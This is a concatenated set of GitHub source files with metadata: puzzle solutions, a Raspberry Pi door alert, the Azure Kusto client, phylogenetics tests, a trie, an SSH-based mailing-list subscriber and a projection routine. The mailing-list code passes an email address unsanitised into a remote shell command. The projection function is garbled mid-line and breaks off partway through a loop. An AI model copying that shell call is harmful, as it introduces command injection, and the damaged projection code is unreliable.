letters += \" \"\n else:\n val = line.split(\" \")\n\n for i in range(0, 2):\n cycle += 1\n signal_strength_sum += check_cycle(cycle, x)\n if check_x(cycle, x):\n letters += \"#\"\n else:\n letters += \" \"\n\n if i == 1:\n x += int(val[1])\n \n return signal_strength_sum, letters\n\nwith open(\"input.txt\", \"r\") as f:\n lines = [l.strip() for l in f.readlines()]\n\nday10 = count_signal_strength(lines)\nprint(\"Part 1: The sum of the signal strengths is\", day10[0])\n\nletters = \"\"\nfor i in range(0,len(day10[1])):\n if i % 40 == 0:\n letters += \"\\n\"\n letters += day10[1][i]\n\nprint(\"Part 2: The solution is:\", \"\\n\", letters)","repo_name":"sagakortesaari/adventofcode","sub_path":"2022/10/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2314841057","text":"from PyQt5.QtWidgets import QMessageBox\n\n\ndef alert(self, str, call_code):\n dlg = QMessageBox(self)\n dlg.setWindowTitle(\"Предупреждение\")\n if call_code == 1:\n dlg.setText(f\"Вы взяли:\\n{str}\")\n elif call_code == 2:\n dlg.setText(f\"Вы вернули:\\n{str}\")\n button = dlg.exec()\n if button == QMessageBox.Ok:\n print(\"OK!\")","repo_name":"Viteeeq/KMU-Project-test","sub_path":"app/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17915681670","text":"#!/usr/bin/env python3\n\n#For use with normally closed (NC) Reed Switch connected to ground & GPIO input\n#If using normally open (NO), simply reverse the booleans.\n\nimport RPi.GPIO as GPIO\nimport time\nimport smtplib\nimport _thread\nimport cred\n\ntry:\n need_clean = False\n\n #Message Template\n #Leading '\\n' is required for sending an email with ':' (SMS/MMS Gateway)\n MSG = '\\nDoor was '\n DOOR_MSG = {True:'opened', False:'closed'}\n\n #Setting up connection to SMTP Server for sending email/sms.\n print('Setting up SMS...')\n #Function to call on new thread\n #Because of race conditions, this needs to be done quickly or on diff thread\n def send_msg(opened:bool):\n #Replace args with your email provider's SMTP details\n server = smtplib.SMTP( \"smtp.gmail.com\", 587 )\n server.starttls()\n server.login( cred.FROM, cred.PASS )\n #Compile message string to print and send.\n #Ex: '\\nDoor was closed at 5:50:20 PM'\n #This way is used because it is quickest and we have race conditions!\n str_print =''.join([MSG, DOOR_MSG[opened], ' at ',\n time.strftime('%I:%M:%S %p')])\n print(str_print)\n server.sendmail(cred.FROM, cred.TO, str_print)\n server.quit()\n\n\n\n #Initializing GPIO\n print('Setting up hardware...')\n PIN = 12\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n #next_state to check for to send message\n next_state = True\n\n need_clean = True\n\n #Running actual program\n print('Ready!')\n #Run infinitely\n while True:\n #Check for next state\n if GPIO.input(PIN) == next_state:\n #Send message on different thread\n _thread.start_new_thread(send_msg, (next_state,))\n #Negate next_state\n next_state = not next_state\n time.sleep(0.3)\n \nexcept KeyboardInterrupt:\n GPIO.cleanup() #For Keyboard Interrupt exit\n need_clean = False\n\nif need_clean: \n GPIO.cleanup() #For normal 
exit\nprint('\\nEnd!')\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source_2/3789.py","file_name":"3789.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"449183580","text":"import socket\nimport sys\nfrom datetime import timedelta\nfrom typing import AnyStr, IO, List, Optional, TYPE_CHECKING, Tuple, Union\n\nimport requests\nimport requests.adapters\nfrom requests import Response\nfrom urllib3.connection import HTTPConnection\n\nfrom azure.core.tracing.decorator import distributed_trace\nfrom azure.core.tracing import SpanKind\n\nfrom azure.kusto.data._telemetry import Span, MonitoredActivity\n\nfrom .client_base import ExecuteRequestParams, _KustoClientBase\nfrom .client_request_properties import ClientRequestProperties\nfrom .data_format import DataFormat\nfrom .exceptions import KustoClosedError, KustoNetworkError\n\nfrom .kcsb import KustoConnectionStringBuilder\nfrom .response import KustoResponseDataSet, KustoStreamingResponseDataSet\nfrom .streaming_response import JsonTokenReader, StreamingDataSetEnumerator\n\nif TYPE_CHECKING:\n pass\n\n\nclass HTTPAdapterWithSocketOptions(requests.adapters.HTTPAdapter):\n def __init__(self, *args, **kwargs):\n self.socket_options = kwargs.pop(\"socket_options\", None)\n super(HTTPAdapterWithSocketOptions, self).__init__(*args, **kwargs)\n\n def __getstate__(self):\n state = super(HTTPAdapterWithSocketOptions, self).__getstate__()\n state[\"socket_options\"] = self.socket_options\n return state\n\n def init_poolmanager(self, *args, **kwargs):\n if self.socket_options is not None:\n kwargs[\"socket_options\"] = self.socket_options\n super(HTTPAdapterWithSocketOptions, self).init_poolmanager(*args, **kwargs)\n\n\nclass KustoClient(_KustoClientBase):\n \"\"\"\n Kusto client for Python.\n The client is a wrapper around the Kusto REST API.\n To read more about it, go to https://docs.microsoft.com/en-us/azure/kusto/api/rest/\n\n The primary methods are:\n `execute_query`: executes a KQL query against the Kusto service.\n `execute_mgmt`: executes a KQL control command against the Kusto service.\n \"\"\"\n\n _mgmt_default_timeout = timedelta(hours=1)\n _query_default_timeout = timedelta(minutes=4)\n _streaming_ingest_default_timeout = timedelta(minutes=10)\n _client_server_delta = timedelta(seconds=30)\n\n # The maximum amount of connections to be able to operate in parallel\n _max_pool_size = 100\n\n def __init__(self, kcsb: Union[KustoConnectionStringBuilder, str]):\n \"\"\"\n Kusto Client constructor.\n :param kcsb: The connection string to initialize KustoClient.\n :type kcsb: azure.kusto.data.KustoConnectionStringBuilder or str\n \"\"\"\n super().__init__(kcsb, False)\n\n # Create a session object for connection pooling\n self._session = requests.Session()\n\n adapter = HTTPAdapterWithSocketOptions(\n socket_options=(HTTPConnection.default_socket_options or []) + self.compose_socket_options(), pool_maxsize=self._max_pool_size\n )\n self._session.mount(\"http://\", adapter)\n self._session.mount(\"https://\", adapter)\n\n def close(self):\n if not self._is_closed:\n self._session.close()\n if self._aad_helper:\n self._aad_helper.close()\n super().close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def set_proxy(self, proxy_url: str):\n super().set_proxy(proxy_url)\n self._session.proxies = {\"http\": proxy_url, \"https\": proxy_url}\n\n def 
set_http_retries(self, max_retries: int):\n \"\"\"\n Set the number of HTTP retries to attempt\n \"\"\"\n adapter = HTTPAdapterWithSocketOptions(\n socket_options=(HTTPConnection.default_socket_options or []) + self.compose_socket_options(),\n pool_maxsize=self._max_pool_size,\n max_retries=max_retries,\n )\n self._session.mount(\"http://\", adapter)\n self._session.mount(\"https://\", adapter)\n\n @staticmethod\n def compose_socket_options() -> List[Tuple[int, int, int]]:\n # Sends TCP Keep-Alive after MAX_IDLE_SECONDS seconds of idleness, once every INTERVAL_SECONDS seconds, and closes the connection after MAX_FAILED_KEEPALIVES failed pings (e.g. 20 => 1:00:30)\n MAX_IDLE_SECONDS = 30\n INTERVAL_SECONDS = 180 # Corresponds to Azure Load Balancer Service 4 minute timeout, with 1 minute of slack\n MAX_FAILED_KEEPALIVES = 20\n\n if (\n sys.platform == \"linux\"\n and hasattr(socket, \"SOL_SOCKET\")\n and hasattr(socket, \"SO_KEEPALIVE\")\n and hasattr(socket, \"TCP_KEEPIDLE\")\n and hasattr(socket, \"TCP_KEEPINTVL\")\n and hasattr(socket, \"TCP_KEEPCNT\")\n ):\n return [\n (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, MAX_IDLE_SECONDS),\n (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, INTERVAL_SECONDS),\n (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, MAX_FAILED_KEEPALIVES),\n ]\n elif (\n sys.platform == \"win32\"\n and hasattr(socket, \"SOL_SOCKET\")\n and hasattr(socket, \"SO_KEEPALIVE\")\n and hasattr(socket, \"TCP_KEEPIDLE\")\n and hasattr(socket, \"TCP_KEEPCNT\")\n ):\n return [\n (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, MAX_IDLE_SECONDS),\n (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, MAX_FAILED_KEEPALIVES),\n ]\n elif sys.platform == \"darwin\" and hasattr(socket, \"SOL_SOCKET\") and hasattr(socket, \"SO_KEEPALIVE\") and hasattr(socket, \"IPPROTO_TCP\"):\n TCP_KEEPALIVE = 0x10\n return [(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1), (socket.IPPROTO_TCP, TCP_KEEPALIVE, INTERVAL_SECONDS)]\n else:\n return []\n\n def execute(self, database: Optional[str], query: str, properties: Optional[ClientRequestProperties] = None) -> KustoResponseDataSet:\n \"\"\"\n Executes a query or management command.\n :param Optional[str] database: Database against query will be executed. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return: Kusto response data set.\n :rtype: azure.kusto.data.response.KustoResponseDataSet\n \"\"\"\n query = query.strip()\n if query.startswith(\".\"):\n return self.execute_mgmt(database, query, properties)\n return self.execute_query(database, query, properties)\n\n @distributed_trace(name_of_span=\"KustoClient.query_cmd\", kind=SpanKind.CLIENT)\n def execute_query(self, database: Optional[str], query: str, properties: Optional[ClientRequestProperties] = None) -> KustoResponseDataSet:\n \"\"\"\n Execute a KQL query.\n To learn more about KQL go to https://docs.microsoft.com/en-us/azure/kusto/query/\n :param Optional[str] database: Database against query will be executed. 
If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return: Kusto response data set.\n :rtype: azure.kusto.data.response.KustoResponseDataSet\n \"\"\"\n database = self._get_database_or_default(database)\n Span.set_query_attributes(self._kusto_cluster, database, properties)\n\n return self._execute(self._query_endpoint, database, query, None, self._query_default_timeout, properties)\n\n @distributed_trace(name_of_span=\"KustoClient.control_cmd\", kind=SpanKind.CLIENT)\n def execute_mgmt(self, database: Optional[str], query: str, properties: Optional[ClientRequestProperties] = None) -> KustoResponseDataSet:\n \"\"\"\n Execute a KQL control command.\n To learn more about KQL control commands go to https://docs.microsoft.com/en-us/azure/kusto/management/\n :param Optional[str] database: Database against query will be executed. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return: Kusto response data set.\n :rtype: azure.kusto.data.response.KustoResponseDataSet\n \"\"\"\n database = self._get_database_or_default(database)\n Span.set_query_attributes(self._kusto_cluster, database, properties)\n\n return self._execute(self._mgmt_endpoint, database, query, None, self._mgmt_default_timeout, properties)\n\n @distributed_trace(name_of_span=\"KustoClient.streaming_ingest\", kind=SpanKind.CLIENT)\n def execute_streaming_ingest(\n self,\n database: Optional[str],\n table: str,\n stream: IO[AnyStr],\n stream_format: Union[DataFormat, str],\n properties: Optional[ClientRequestProperties] = None,\n mapping_name: str = None,\n ):\n \"\"\"\n Execute streaming ingest against this client\n If the Kusto service is not configured to allow streaming ingestion, this may raise an error\n To learn more about streaming ingestion go to:\n https://docs.microsoft.com/en-us/azure/data-explorer/ingest-data-streaming\n :param Optional[str] database: Target database. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str table: Target table.\n :param io.BaseIO stream: stream object which contains the data to ingest.\n :param DataFormat stream_format: Format of the data in the stream.\n :param ClientRequestProperties properties: additional request properties.\n :param str mapping_name: Pre-defined mapping of the table. 
Required when stream_format is json/avro.\n \"\"\"\n database = self._get_database_or_default(database)\n Span.set_streaming_ingest_attributes(self._kusto_cluster, database, table, properties)\n\n stream_format = stream_format.kusto_value if isinstance(stream_format, DataFormat) else DataFormat[stream_format.upper()].kusto_value\n endpoint = self._streaming_ingest_endpoint + database + \"/\" + table + \"?streamFormat=\" + stream_format\n if mapping_name is not None:\n endpoint = endpoint + \"&mappingName=\" + mapping_name\n\n self._execute(endpoint, database, None, stream, self._streaming_ingest_default_timeout, properties)\n\n def _execute_streaming_query_parsed(\n self,\n database: Optional[str],\n query: str,\n timeout: timedelta = _KustoClientBase._query_default_timeout,\n properties: Optional[ClientRequestProperties] = None,\n ) -> StreamingDataSetEnumerator:\n response = self._execute(self._query_endpoint, database, query, None, timeout, properties, stream_response=True)\n response.raw.decode_content = True\n return StreamingDataSetEnumerator(JsonTokenReader(response.raw))\n\n @distributed_trace(name_of_span=\"KustoClient.streaming_query\", kind=SpanKind.CLIENT)\n def execute_streaming_query(\n self,\n database: Optional[str],\n query: str,\n timeout: timedelta = _KustoClientBase._query_default_timeout,\n properties: Optional[ClientRequestProperties] = None,\n ) -> KustoStreamingResponseDataSet:\n \"\"\"\n Execute a KQL query without reading it all to memory.\n The resulting KustoStreamingResponseDataSet will stream one table at a time, and the rows can be retrieved sequentially.\n\n :param Optional[str] database: Database against query will be executed. If not provided, will default to the \"Initial Catalog\" value in the connection string\n :param str query: Query to be executed.\n :param timedelta timeout: timeout for the query to be executed\n :param azure.kusto.data.ClientRequestProperties properties: Optional additional properties.\n :return KustoStreamingResponseDataSet:\n \"\"\"\n Span.set_query_attributes(self._kusto_cluster, database, properties)\n\n return KustoStreamingResponseDataSet(self._execute_streaming_query_parsed(database, query, timeout, properties))\n\n def _execute(\n self,\n endpoint: str,\n database: Optional[str],\n query: Optional[str],\n payload: Optional[IO[AnyStr]],\n timeout: timedelta,\n properties: Optional[ClientRequestProperties] = None,\n stream_response: bool = False,\n ) -> Union[KustoResponseDataSet, Response]:\n \"\"\"Executes given query against this client\"\"\"\n if self._is_closed:\n raise KustoClosedError()\n self.validate_endpoint()\n request_params = ExecuteRequestParams(\n database,\n payload,\n properties,\n query,\n timeout,\n self._request_headers,\n self._mgmt_default_timeout,\n self._client_server_delta,\n self.client_details,\n )\n json_payload = request_params.json_payload\n request_headers = request_params.request_headers\n timeout = request_params.timeout\n if self._aad_helper:\n request_headers[\"Authorization\"] = self._aad_helper.acquire_authorization_header()\n\n # trace http post call for response\n invoker = lambda: self._session.post(\n endpoint,\n headers=request_headers,\n json=json_payload,\n data=payload,\n timeout=timeout.seconds,\n stream=stream_response,\n allow_redirects=False,\n )\n\n try:\n response = MonitoredActivity.invoke(\n invoker, name_of_span=\"KustoClient.http_post\", tracing_attributes=Span.create_http_attributes(\"POST\", endpoint, request_headers)\n )\n except Exception as e:\n raise 
KustoNetworkError(endpoint, None if properties is None else properties.client_request_id) from e\n\n        if stream_response:\n            try:\n                response.raise_for_status()\n                if 300 <= response.status_code < 400:\n                    raise Exception(\"Unexpected redirection, got status code: \" + str(response.status_code))\n                return response\n            except Exception as e:\n                raise self._handle_http_error(e, self._query_endpoint, None, response, response.status_code, response.json(), response.text)\n\n        response_json = None\n        try:\n            if 300 <= response.status_code < 400:\n                raise Exception(\"Unexpected redirection, got status code: \" + str(response.status_code))\n            response_json = response.json()\n            response.raise_for_status()\n        except Exception as e:\n            raise self._handle_http_error(e, endpoint, payload, response, response.status_code, response_json, response.text)\n        # trace response processing\n        return MonitoredActivity.invoke(lambda: self._kusto_parse_by_endpoint(endpoint, response_json), name_of_span=\"KustoClient.processing_response\")\n","repo_name":"Azure/azure-kusto-python","sub_path":"azure-kusto-data/azure/kusto/data/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":15152,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"72"} +{"seq_id":"15926714498","text":"import jax.numpy as np\nimport pytest\nfrom jax import grad, vjp\n\nimport phylojax.treelikelihood as treelikelihood\nfrom phylojax.io import read_tree_and_alignment\nfrom phylojax.sitepattern import get_dna_leaves_partials_compressed\nfrom phylojax.tree import postorder_indices, preorder_indices\n\n\ndef extract_branch_lengths(tree):\n    nodes = [None] * (len(tree.taxon_namespace) * 2 - 1)\n    for node in tree.postorder_node_iter():\n        nodes[node.index] = node.edge_length\n    nodes.pop()\n    return np.array([[float(x) for x in nodes]])\n\n\ndef test_calculate_unrooted_efficient(hello_tree_file, hello_fasta_file, jc69_model):\n    tree, dna = read_tree_and_alignment(hello_tree_file, hello_fasta_file, False, False)\n    indices = postorder_indices(tree)\n    pre_indices = preorder_indices(tree)\n    branch_lengths = extract_branch_lengths(tree)\n    bls = np.expand_dims(branch_lengths, axis=-1)\n    partials, weights = get_dna_leaves_partials_compressed(dna)\n    tip_partials = np.array(partials[: len(tree.taxon_namespace)])\n    frequencies = np.broadcast_to(\n        jc69_model.frequencies, branch_lengths.shape[:-1] + (4,)\n    )\n    frequencies = np.expand_dims(frequencies, axis=-2)\n    mats = jc69_model.p_t(bls)\n    mats = np.expand_dims(mats, -3)\n    props = np.array([[[1.0]]])\n    partials = treelikelihood.calculate_partials(\n        tip_partials,\n        indices,\n        mats,\n        props,\n    )\n\n    # calculate log likelihood at every node using upper partials\n    uppers = treelikelihood.calculate_upper_partials(partials, pre_indices, mats)\n    for i in range(uppers.shape[0]):\n        log_p2 = treelikelihood.calculate_treelikelihood_upper(\n            partials[i],\n            uppers[i],\n            weights,\n            mats[:, i, ...],\n            frequencies,\n            props,\n        )\n        assert -84.852358 == pytest.approx(float(log_p2), 0.0001)\n\n    # analytical derivatives\n    expected_gradient = (21.0223, -5.34462, -17.7298, -17.7298)\n    dmats = jc69_model.dp_dt(bls)\n    dmats = np.expand_dims(dmats, -3)\n    likelihoods = frequencies @ np.sum(partials[-1], -3)\n    gradient = treelikelihood.calculate_treelikelihood_gradient(\n        likelihoods, partials, uppers, weights, dmats, frequencies, props\n    )\n    assert np.allclose(gradient.squeeze(), expected_gradient, rtol=0.0001)\n
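\n    # Aside: for a scalar-valued log-likelihood such as this one, jax.grad is\n    # reverse-mode autodiff with a unit cotangent, i.e. grad(f)(x) equals\n    # vjp(f, x)[1](1.0)[0]; test_calculate_unrooted below pulls the same\n    # gradient back through jax.vjp explicitly via vjp_fn(np.ones(y.shape)).\n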
\n    # analytical derivatives using custom_jvp\n    log_p3 = treelikelihood.calculate_treelikelihood_custom(\n        branch_lengths, tip_partials, weights, (indices, pre_indices), jc69_model, props\n    )\n    assert -84.852358 == pytest.approx(float(log_p3), 0.0001)\n    g = grad(treelikelihood.calculate_treelikelihood_custom)\n    gradient2 = g(\n        branch_lengths,\n        tip_partials,\n        weights,\n        (np.array(indices, dtype=np.int32), np.array(pre_indices, dtype=np.int32)),\n        jc69_model,\n        props,\n    )\n    assert np.allclose(gradient2.squeeze(), expected_gradient, rtol=0.0001)\n\n\ndef test_calculate_unrooted(hello_tree_file, hello_fasta_file, jc69_model):\n    tree, dna = read_tree_and_alignment(hello_tree_file, hello_fasta_file, False, False)\n    indices = postorder_indices(tree)\n    branch_lengths = extract_branch_lengths(tree)\n    bls = np.expand_dims(branch_lengths, axis=-1)\n    partials, weights = get_dna_leaves_partials_compressed(dna)\n    tip_partials = np.array(partials[: len(tree.taxon_namespace)])\n    frequencies = np.broadcast_to(\n        jc69_model.frequencies, branch_lengths.shape[:-1] + (4,)\n    )\n\n    def fn(bls):\n        mats = jc69_model.p_t(bls)\n        return treelikelihood.calculate_treelikelihood(\n            tip_partials,\n            weights,\n            indices,\n            np.expand_dims(mats, -3),\n            np.expand_dims(frequencies, axis=-2),\n            np.array([[[1.0]]]),\n        )\n\n    y, vjp_fn = vjp(fn, bls)\n    gradient = vjp_fn(np.ones(y.shape))[0]\n    expected_gradient = (21.0223, -5.34462, -17.7298, -17.7298)\n    assert all(\n        [\n            a == pytest.approx(b, 0.0001)\n            for a, b in zip(expected_gradient, np.squeeze(gradient))\n        ]\n    )\n\n    mats = jc69_model.p_t(bls)\n    log_p = treelikelihood.calculate_treelikelihood(\n        tip_partials,\n        weights,\n        indices,\n        np.expand_dims(mats, -3),\n        np.expand_dims(frequencies, axis=-2),\n        np.array([[[1.0]]]),\n    )\n    assert -84.852358 == pytest.approx(float(log_p), 0.0001)\n\n\ndef test_calculate_likelihood_rooted(flu_a_tree_file, flu_a_fasta_file, jc69_model):\n    tree, dna = read_tree_and_alignment(flu_a_tree_file, flu_a_fasta_file, True, True)\n    indices = postorder_indices(tree)\n    partials, weights = get_dna_leaves_partials_compressed(dna)\n    tip_partials = np.array(partials[: len(tree.taxon_namespace)])\n    branch_lengths = extract_branch_lengths(tree) * 0.001\n    mats = jc69_model.p_t(np.expand_dims(branch_lengths, axis=-1))\n    frequencies = np.broadcast_to(\n        jc69_model.frequencies, branch_lengths.shape[:-1] + (4,)\n    )\n\n    log_p = treelikelihood.calculate_treelikelihood(\n        tip_partials,\n        weights,\n        indices,\n        np.expand_dims(mats, -3),\n        np.expand_dims(frequencies, axis=-2),\n        np.array([[[1.0]]]),\n    )\n    assert -4777.616349 == pytest.approx(float(log_p), 0.0001)\n","repo_name":"4ment/phylojax","sub_path":"test/test_likelihood.py","file_name":"test_likelihood.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34703218471","text":"# @TIME : 2019/7/29 10:42 PM\n# @File : tire_tree.py\n\nclass TrieNode:\n\n    def __init__(self):\n        self.children = [None] * 26\n        self.isEndOfWord = False\n\nclass Tire:\n\n    def __init__(self):\n        self.root = self.getNode()\n\n    def getNode(self):\n        return TrieNode()\n\n    def _charToIndex(self, ch):\n        \"\"\"Convert the current key character into a child index\n        (uses only lower-case 'a' through 'z')\"\"\"\n        rel = ord(ch) - ord('a')\n        return rel\n
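\n    # Example: after insert(\"the\") and insert(\"their\"), the two keys share\n    # the t->h->e chain of nodes; isEndOfWord is True on the node reached by\n    # \"the\" and on the final 'r' of \"their\". _charToIndex('c') == 2, so\n    # children[2] of any node is its 'c' branch.\n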
\n    def insert(self, key):\n        pCrawl = self.root # the head pointer itself is preserved -- nice design\n        length = len(key)\n        for level in range(length):\n            index = self._charToIndex(key[level])\n            if not pCrawl.children[index]:\n                pCrawl.children[index] = self.getNode()\n\n            pCrawl = pCrawl.children[index] # advance node by node, like walking a linked list\n\n        pCrawl.isEndOfWord = True\n\n    def search(self, key):\n        pCrawl = self.root\n        length = len(key)\n        for level in range(length):\n            index = self._charToIndex(key[level])\n            if not pCrawl.children[index]:\n                return False\n            pCrawl = pCrawl.children[index]\n\n        return pCrawl is not None and pCrawl.isEndOfWord\n\n\nif __name__ == \"__main__\":\n\n    keys = ['the', 'a', 'there', 'anaswe', 'any', 'by', 'their']\n\n    t = Tire()\n\n    for key in keys:\n        t.insert(key)\n\n    print(t.search('there'))\n\n\n","repo_name":"yjfiejd/2019xuexi","sub_path":"Leetcode-practice/tire_tree.py","file_name":"tire_tree.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40644446530","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom confspirator import groups as conf_group\nfrom confspirator import fields as conf_field\nimport paramiko\n\nfrom adjutant.config import CONF\n\nfrom adjutant_moc.actions import serializers\nfrom adjutant_moc.actions import base\n\n\nclass Mailman(object):\n\n    def __init__(self, hostname, port, username, key):\n        self.hostname = hostname\n        self.port = port\n        self.username = username\n        self.key = key\n        self.client = paramiko.client.SSHClient()\n\n    def __enter__(self):\n        self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n        self.client.connect(\n            hostname=self.hostname,\n            port=self.port,\n            username=self.username,\n            pkey=paramiko.RSAKey.from_private_key_file(self.key))\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        self.client.close()\n\n    def _execute(self, command):\n        stdin, stdout, stderr = self.client.exec_command(command)\n\n        errors = stderr.read()\n        if errors:\n            raise ConnectionError(errors)\n\n        # Note(knikolla): Not entirely sure if closing before reading is fine.\n        r = stdout.read().decode('utf-8').split('\\n')\n        return r\n\n    def is_already_subscribed(self, email, list):\n        command = ('/usr/lib/mailman/bin/list_members %s' % list)\n        return email in self._execute(command)\n\n    def subscribe(self, email, list):\n        command = (\n            'echo %s | /usr/lib/mailman/bin/add_members -r - %s'\n            % (email, list)\n        )\n        self._execute(command)\n\n\n# TODO knikolla: there are going to be issues here when we\n# add invited users, since get email returns the one who created the task.\nclass MailingListSubscribeAction(base.MocBaseAction):\n\n    required = [\n        'email'\n    ]\n\n    serializer = serializers.MailingListSubscribeSerializer\n\n    config_group = conf_group.DynamicNameConfigGroup(\n        children=[\n            conf_field.StrConfig(\n                \"private_key\",\n                help_text=\"Location of private key for mailing list server.\",\n                default=\"/.ssh/id_rsa\",\n                sample_default=\"/.ssh/id_rsa\",\n            ),\n            conf_field.HostNameConfig(\n                \"host\",\n                help_text=\"Mailing list server host.\",\n                default=\"mail.massopen.cloud\",\n                sample_default=\"mail.massopen.cloud\",\n            ),\n            conf_field.IntConfig(\n                \"port\",\n                help_text=\"Mailing 
list server SSH port\",\n default=22,\n sample_default=22,\n ),\n conf_field.StrConfig(\n \"user\",\n help_text=\"Mailing list server user.\",\n default=\"moc-tools\",\n sample_default=\"moc-tools\",\n ),\n conf_field.StrConfig(\n \"list\",\n help_text=\"Mailing list to add users to.\",\n default=\"kaizen-users\",\n sample_default=\"kaizen-users\",\n ),\n ],\n )\n\n def _get_email(self):\n if CONF.identity.username_is_email:\n return self.action.task.keystone_user['username']\n\n def _approve(self):\n try:\n with Mailman(self.config.host, self.config.port,\n self.config.user, self.config.private_key) as mailman:\n if mailman.is_already_subscribed(self._get_email(),\n self.config.list):\n self.add_note('%s already subscribed to mailing list.'\n % self._get_email())\n else:\n mailman.subscribe(self._get_email(), self.config.list)\n self.add_note('%s successfully subscribed to mailing list.'\n % self._get_email())\n except paramiko.ssh_exception.SSHException as e:\n self.add_note('Unable to connect to Mailing List server. '\n 'Proceeding regardless. %s' % str(e))\n\n self.action.state = 'complete'\n self.action.save()\n\n def _submit(self, token_data):\n pass\n","repo_name":"CCI-MOC/adjutant-moc","sub_path":"adjutant_moc/actions/mailing_list.py","file_name":"mailing_list.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40345380575","text":"import logging\n\nlogger = logging.getLogger('scheduler')\n_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s - %(module)s - %(lineno)d')\n\n\nfh = logging.FileHandler('scheduler_log.log', encoding='utf-8')\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(_formatter)\n\ncr = logging.FileHandler('error.log', encoding='utf-8')\ncr.setLevel(logging.ERROR)\ncr.setFormatter(_formatter)\n\nlogger.addHandler(fh)\nlogger.addHandler(cr)\nlogger.setLevel(logging.DEBUG)\n\n\nif __name__ == '__main__':\n logger.info('Info')\n logger.warning('Warning')\n logger.debug('debug')\n logger.error('error')\n logger.critical('critical')\n","repo_name":"ZakirovRail/scheduler","sub_path":"log_config.py","file_name":"log_config.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17236192959","text":"'''\n Fast projections onto the hypercube with a sum constraint (simplex).\n\n Two methods implemented: one that does direct search of kkt conditions,\n one that does iterative search (interpolation search).\n\n Uses numba to speed up computation.\n\n Benjamin Recht, March 6, 2017\n edited by Sarah Dean, March 7, 2017\n'''\nimport numpy as np\n#from numba import jit\n\n#@jit('void(double[:], intp, double[:], intp[:])', nopython=True, nogil=True)\ndef project_kkt(z, r, zProj, sortOrder):\n '''\n Jitted code to compute the ppr projection. 
Requires sort by numpy, but\n    then goes to town.\n\n    Input: z: a vector assumed to be a numpy array\n           sortOrder: the arguments that sort z in descending order\n           r: the target sum\n\n    Returns: zProj projected onto the set\n    '''\n    n = len(z)\n\n    # check if there is a trivial solution\n    if z[sortOrder[r-1]]>=z[sortOrder[r]]+1:\n        for i in range(n):\n            if i<r:\n                zProj[sortOrder[i]] = 1.0\n            else:\n                zProj[sortOrder[i]] = 0.0\n        return\n\n    # NOTE: the initialization of theta and of the active/clipped set\n    # trackers was lost to extraction damage; the following is a plausible\n    # reconstruction consistent with the update loop below.\n    theta = -z[sortOrder[0]]   # start where the projection sums to zero\n    A = -1   # index of the last entry of the active set (z[i] >= -theta)\n    C = -1   # index of the last entry of the clipped set (z[i] >= 1-theta)\n    for i in range(n):\n        if z[i] >= -theta:\n            A+=1\n        if z[i] >= 1-theta:\n            C+=1\n\n    # compute sum of all entries in active set\n    active_sum = 0.0\n    for i in range(C+1,A+1):\n        active_sum+=z[sortOrder[i]]\n\n    while 1:\n        # compute distance to increasing clipped set\n        DeltaC = 1-theta-z[sortOrder[C+1]]\n        # compute distance to increasing active set\n        DeltaA = -theta-z[sortOrder[A+1]]\n        Delta = min(DeltaA,DeltaC)\n\n        # if we can take a step without changing active and clipped sets\n        # and achieve sum r, then we are done\n        if C+1 + active_sum + (A-C)*(theta+Delta) >= r:\n            # beta is the exact offset that makes the projection sum to r\n            beta = (r-C-1-active_sum)/(A-C)\n            for i in range(n):\n                zProj[i] = max(min(z[i]+beta,1.0),0.0)\n            break\n        else:\n            # otherwise, update the active and clipped sets, update\n            # the sum of the active set, and update theta.\n            if DeltaA==Delta:\n                while 